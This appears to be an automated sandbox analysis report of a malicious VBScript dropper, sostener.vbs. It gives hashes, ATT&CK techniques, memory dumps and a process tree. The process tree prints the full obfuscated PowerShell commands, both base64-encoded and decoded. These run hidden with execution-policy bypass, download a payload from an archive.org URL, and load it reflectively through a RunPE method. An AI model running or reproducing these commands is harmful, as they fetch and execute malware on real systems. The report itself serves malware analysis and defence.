fa6ef44602cd8b93885484c8408e6155d1747acfa361857cce7fbf8601ab689f

General

Target

sostener.vbs
Size

503KB
MD5

5d616b1f098785c46701bf12ee40244b
SHA1

21c4bfda03dc3fbaa452769a05f80d0390c8b0bb
SHA256

fa6ef44602cd8b93885484c8408e6155d1747acfa361857cce7fbf8601ab689f
SHA512

25973fbcbfc8b06b0811aea729c3c5429d9fa06a4c60a445cdbfef19d61fb52c8dfe09765291e238ec5b827015777982374b68c6bcfbe8c26e876d416299eac1
SSDEEP

12288:1H+cpW8xL9zJrxSWoixru+AMKzy3ggdiLkq3ahosUAwnJiWSXPJVpBPPwliMd:g03EKa+zKwdPf5S

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2136	powershell.exe
6	2136	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2032	powershell.exe
2136	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2032	powershell.exe
2136	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1568 wrote to memory of 2032	1568	WScript.exe	29
PID 1568 wrote to memory of 2032	1568	WScript.exe	29
PID 1568 wrote to memory of 2032	1568	WScript.exe	29
PID 2032 wrote to memory of 2136	2032	powershell.exe	31
PID 2032 wrote to memory of 2136	2032	powershell.exe	31
PID 2032 wrote to memory of 2136	2032	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dXInKydsID0gezB9aHR0cHM6JysnLy9pJysnYTYnKycwMDEwMC51cy5hcmMnKydoJysnaXZlLicrJ29yZy8yNCcrJy9pdGUnKydtcycrJy9kZXRhaC1uJysnb3RlLXYvJysnRGV0YScrJ2hOb3RlVi50eHQnKyd7MCcrJ307eycrJzF9JysnYmEnKydzZTYnKyc0JysnQ28nKyduJysndGVuJysndCA9IChOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuVycrJ2ViJysnQ2wnKydpZW50JysnKScrJy5EJysnbycrJ3dubCcrJ28nKydhZCcrJ1N0JysncmluZyh7MScrJ30nKyd1cmwpO3snKycxJysnfScrJ2JpJysnbmEnKydyeUNvbicrJ3QnKydlJysnbicrJ3QgPScrJyBbUycrJ3lzdGVtLkMnKydvbnYnKydlcicrJ3QnKyddOicrJzpGJysncicrJ29tQicrJ2EnKydzJysnZTY0UycrJ3QnKydyaW5nKCcrJ3snKycxfWInKydhc2U2JysnNCcrJ0NvbnQnKydlbnQnKycpO3sxJysnfWFzc2VtYmx5ICcrJz0gW1JlJysnZicrJ2xlJysnYycrJ3Rpb24uJysnQScrJ3NzZW1ibCcrJ3knKyddOjpMb2FkKCcrJ3sxJysnfWInKydpJysnbmEnKydyJysneUNvbicrJ3RlbicrJ3QpJysnO3sxfXQnKyd5cCcrJ2UgJysnPSAnKyd7MX1hJysnc3NlbWJseScrJy5HZXRUeXAnKydlKHswfVJ1JysnblBFLkhvJysnbWV7MH0pO3sxJysnfW0nKydldGhvZCA9IHsxfXR5cCcrJ2UuJysnR2V0TWV0aG9kJysnKHsnKycwfVYnKydBSXsnKycwJysnfScrJyk7eycrJzF9bWV0JysnaG9kLkluJysndm9rZScrJygnKyd7JysnMX0nKyduJysndWxsLCBbb2InKydqZWN0W11dJysnQCcrJygnKyd7MH0nKycwL1R1JysnUicrJzVSL2QvZScrJ2UnKycuZXQnKydzYXAnKycvJysnLzpzJysncCcrJ3R0aHswJysnfSAnKycsICcrJ3snKycwfScrJ2Rlc2F0aXYnKydhZG97MH0gJysnLCcrJyB7MH1kZXNhJysndGknKyd2YScrJ2QnKydvJysnezB9ICwnKycgJysnezB9ZCcrJ2VzYXRpJysndmFkb3swfSx7MH1BZGRJblByJysnbycrJ2NlcycrJ3MzMicrJ3swJysnfSwnKyd7MH17MH0nKycpKScpIC1mW2NIQXJdMzksW2NIQXJdMzYpIHwuKCAkc0hFbGxpRFsxXSskU2hlbExJZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}ur'+'l = {0}https:'+'//i'+'a6'+'00100.us.arc'+'h'+'ive.'+'org/24'+'/ite'+'ms'+'/detah-n'+'ote-v/'+'Deta'+'hNoteV.txt'+'{0'+'};{'+'1}'+'ba'+'se6'+'4'+'Co'+'n'+'ten'+'t = (Ne'+'w-Object System.Net.W'+'eb'+'Cl'+'ient'+')'+'.D'+'o'+'wnl'+'o'+'ad'+'St'+'ring({1'+'}'+'url);{'+'1'+'}'+'bi'+'na'+'ryCon'+'t'+'e'+'n'+'t ='+' [S'+'ystem.C'+'onv'+'er'+'t'+']:'+':F'+'r'+'omB'+'a'+'s'+'e64S'+'t'+'ring('+'{'+'1}b'+'ase6'+'4'+'Cont'+'ent'+');{1'+'}assembly '+'= [Re'+'f'+'le'+'c'+'tion.'+'A'+'ssembl'+'y'+']::Load('+'{1'+'}b'+'i'+'na'+'r'+'yCon'+'ten'+'t)'+';{1}t'+'yp'+'e '+'= '+'{1}a'+'ssembly'+'.GetTyp'+'e({0}Ru'+'nPE.Ho'+'me{0});{1'+'}m'+'ethod = {1}typ'+'e.'+'GetMethod'+'({'+'0}V'+'AI{'+'0'+'}'+');{'+'1}met'+'hod.In'+'voke'+'('+'{'+'1}'+'n'+'ull, [ob'+'ject[]]'+'@'+'('+'{0}'+'0/Tu'+'R'+'5R/d/e'+'e'+'.et'+'sap'+'/'+'/:s'+'p'+'tth{0'+'} '+', '+'{'+'0}'+'desativ'+'ado{0} '+','+' {0}desa'+'ti'+'va'+'d'+'o'+'{0} ,'+' '+'{0}d'+'esati'+'vado{0},{0}AddInPr'+'o'+'ces'+'s32'+'{0'+'},'+'{0}{0}'+'))') -f[cHAr]39,[cHAr]36) |.( $sHElliD[1]+$ShelLId[13]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2048e64861e03b6a82790fee0c5b7133

SHA1
7ea01b65741599196ce41f8cb737f69b17505185

SHA256
4de295c0680c8234343295fc31ee3db63b43a1be3b51150c35358c2fd46e7614

SHA512
956080c10382d39a046cdd88447df974476e74d58d53c0015fcffd2b8a292510580dbe9a99634724cd8a64ee486cbfe5239260b88224b8cea1ee5ada48cb1ec6

Download Submit
memory/2032-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

Filesize
4KB

Download
memory/2032-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download
memory/2032-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2032-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-8-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-16-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing